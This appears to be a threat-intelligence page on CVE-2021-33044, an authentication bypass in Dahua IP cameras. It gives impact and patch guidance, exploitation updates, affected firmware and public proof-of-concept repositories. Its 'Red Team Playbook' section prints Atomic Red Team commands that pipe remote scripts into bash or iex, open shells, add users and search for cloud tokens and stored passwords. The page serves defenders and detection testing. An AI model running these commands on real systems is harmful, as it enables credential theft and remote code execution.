CVE-2021-33044
Overview
This vulnerability is an identity authentication bypass affecting Dahua IP Camera and related devices. The root cause lies in improper validation during the login process, allowing attackers to craft malicious data packets that circumvent the authentication mechanism. The flaw specifically impacts the device's authentication component responsible for verifying user identity.
Vulnerability Description
The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
Impact
An attacker can gain unauthorized full access to affected Dahua devices without any authentication or user interaction. This access allows compromise of device security, including viewing or manipulating video streams, altering device configurations, and potentially pivoting within the network. The vulnerability can lead to significant breaches of privacy and system integrity in environments relying on these devices for security monitoring.
Solution
Dahua has released security updates addressing this authentication bypass for affected firmware versions, detailed at https://www.dahuasecurity.com/support/cybersecurity/details/957. Users should apply the latest firmware patches for IPC-HUM7XXX, IPC-HX3XXX, IPC-HX5XXX, SD1A1, and SD22 devices as specified in the vendor advisory. No alternative workarounds are provided; applying the vendor-supplied patches is required to remediate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The identity authentication bypass vulnerability found in various Dahua products poses a significant security risk, particularly during the login process. This flaw allows attackers to circumvent the device's authentication mechanisms by sending specially crafted malicious data packets. The vulnerability arises from inadequate validation of input data, which can lead to unauthorized access to the device's functionalities. This issue is particularly concerning for devices that are often deployed in sensitive environments, such as surveillance systems and access control mechanisms, where maintaining the integrity of authentication processes is crucial.
Attack vectors exploiting this vulnerability are relatively straightforward. An attacker could leverage network access to the affected devices, sending crafted packets that exploit the authentication bypass. This could be executed remotely, meaning that an attacker does not need physical access to the device to initiate an attack. Scenarios could range from unauthorized viewing of live camera feeds to manipulation of device settings, which could lead to further exploitation or data breaches. The ease of exploitation, combined with the high visibility of the affected devices, makes this vulnerability particularly attractive to threat actors.
The real-world impact of this vulnerability can be profound, especially for organizations relying on Dahua products for security and surveillance. Unauthorized access could lead to significant breaches of privacy, loss of sensitive data, and potential regulatory repercussions, particularly in jurisdictions with strict data protection laws. The business risks associated with such breaches include reputational damage, financial losses from remediation efforts, and potential legal liabilities. Furthermore, if these devices are part of a larger network, the compromised authentication could serve as a foothold for further attacks, amplifying the overall risk to the organization.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest versions provided by Dahua is essential, as these updates often contain patches for known vulnerabilities. Network segmentation can also help limit the exposure of these devices to potential attackers, reducing the attack surface. Additionally, employing intrusion detection systems (IDS) can aid in identifying unusual traffic patterns that may indicate exploitation attempts. Organizations should also conduct regular security assessments and penetration testing to evaluate their defenses against such vulnerabilities.
In conclusion, the identity authentication bypass vulnerability in Dahua products underscores the critical need for robust security measures in IoT and surveillance devices. The potential for unauthorized access and the subsequent risks to privacy and data integrity highlight the importance of proactive security management. By understanding the technical details, potential attack vectors, and implementing effective detection and mitigation strategies, organizations can better protect themselves against the threats posed by such vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting the identity authentication bypass vulnerability in Dahua IP camera firmware. New proof-of-concept exploits have surfaced publicly, including multiple Chrome extensions and research toolkits that facilitate unauthorized access without authentication. This expansion of the exploit landscape is accompanied by the vulnerability’s addition to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its elevated operational relevance. Our telemetry indicates a rapid increase in detection events, reflecting active adversary interest and likely attempts to leverage this flaw in real-world scenarios. The CVSS score has been formally assigned as 9.8, aligning with the critical severity of the vulnerability, while the EPSS score has surged to near certainty of exploitation, signaling imminent risk. Collectively, these developments significantly heighten the threat level, indicating that defenders must now regard this vulnerability as actively exploited and prioritize monitoring accordingly.
Update 2 — July 09, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2021-33044, with telemetry indicating a substantial increase in adversary attempts to exploit this identity authentication bypass vulnerability in Dahua IP camera firmware. This surge is accompanied by the emergence of multiple new proof-of-concept exploits, including several Chrome extensions and research toolkits that facilitate unauthorized access without authentication. Although the EPSS score remains stable near certainty, the sharp rise in observed exploitation attempts underscores a growing operational interest and capability among threat actors. This development elevates the threat level, signaling that the vulnerability is not only theoretically exploitable but is actively targeted in the wild, thereby increasing the urgency for defenders to enhance monitoring and detection efforts around affected Dahua devices.
Affected Products (19)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dahuasecurity | Ipc-Hum7xxx Firmware | All |
cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Ipc-Hx3xxx Firmware | All |
cpe:2.3:o:dahuasecurity:ipc-hx3xxx_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Ipc-Hx5xxx Firmware | All |
cpe:2.3:o:dahuasecurity:ipc-hx5xxx_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Sd1a1 Firmware | All |
cpe:2.3:o:dahuasecurity:sd1a1_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Sd22 Firmware | All |
cpe:2.3:o:dahuasecurity:sd22_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Sd49 Firmware | All |
cpe:2.3:o:dahuasecurity:sd49_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Sd50 Firmware | All |
cpe:2.3:o:dahuasecurity:sd50_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Sd52c Firmware | All |
cpe:2.3:o:dahuasecurity:sd52c_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Sd6al Firmware | All |
cpe:2.3:o:dahuasecurity:sd6al_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Tpc-Bf1241 Firmware | All |
cpe:2.3:o:dahuasecurity:tpc-bf1241_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Tpc-Bf2221 Firmware | All |
cpe:2.3:o:dahuasecurity:tpc-bf2221_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Tpc-Bf5x01 Firmware | All |
cpe:2.3:o:dahuasecurity:tpc-bf5x01_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Tpc-Pt8x21b Firmware | All |
cpe:2.3:o:dahuasecurity:tpc-pt8x21b_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Tpc-Sd2221 Firmware | All |
cpe:2.3:o:dahuasecurity:tpc-sd2221_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Tpc-Sd8x21 Firmware | All |
cpe:2.3:o:dahuasecurity:tpc-sd8x21_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Vto-65xxx Firmware | All |
cpe:2.3:o:dahuasecurity:vto-65xxx_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Vto-75x95x Firmware | All |
cpe:2.3:o:dahuasecurity:vto-75x95x_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Vth-542xh Firmware | All |
cpe:2.3:o:dahuasecurity:vth-542xh_firmware:*:*:*:*:*:*:*:*
|
|
|
Dahuasecurity | Tpc-Bf5x21 Firmware | All |
cpe:2.3:o:dahuasecurity:tpc-bf5x21_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (8)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
bp2008/DahuaLoginBypass
Chrome extension that uses vulnerabilities CVE-2021-33044 and CVE-2021-33045 to log in to Dahua cameras without authenti...
|
bp2008 | 188 | 42 | 2021-10-11 | View |
|
umair-aziz025/dahua-cve-research
Dahua IP camera CVE research toolkit (CVE-2021-33044/33045, CVE-2025-31700/31701)
|
umair-aziz025 | 20 | 6 | 2026-03-03 | View |
|
Spy0x7/CVE-2021-33044
Dahua IPC/VTH/VTO devices auth bypass exploit
|
Spy0x7 | 3 | 12 | 2021-10-18 | View |
|
Bd-Mutant7/DahuaLoginBypass
Chrome extension that uses vulnerabilities CVE-2021-33044 and CVE-2021-33045 to log in to Dahua cameras without authenti...
|
Bd-Mutant7 | 4 | 1 | 2026-03-28 | View |
|
haingn/LoHongCam-CVE-2021-33044
|
haingn | 3 | 2 | 2023-10-22 | View |
|
eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044
Camera Dahua Research lỗ hổng CVE-2021-33044
|
eagle-nett | 1 | 0 | 2026-03-24 | View |
|
litndat/Camera-Dahua-Research-l-h-ng-CVE-2021-33044
DAHUA_AUTH-BYPASS-CVE-2021-33044
|
litndat | 0 | 0 | 2026-06-24 | View |
|
Baza-NATO/CVE-2021-33044
|
Baza-NATO | 0 | 0 | 2026-01-25 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-33044 |
| dahuasecurity.com |
GitHub CVE
x_refsource_MISC
|
https://www.dahuasecurity.com/support/cybersecurity/details/957 |
| seclists.org |
GitHub CVE
mailing-list
x_refsource_FULLDISC
|
http://seclists.org/fulldisclosure/2021/Oct/13 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/164423/Dahua-Authentication-Bypass.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-33044 |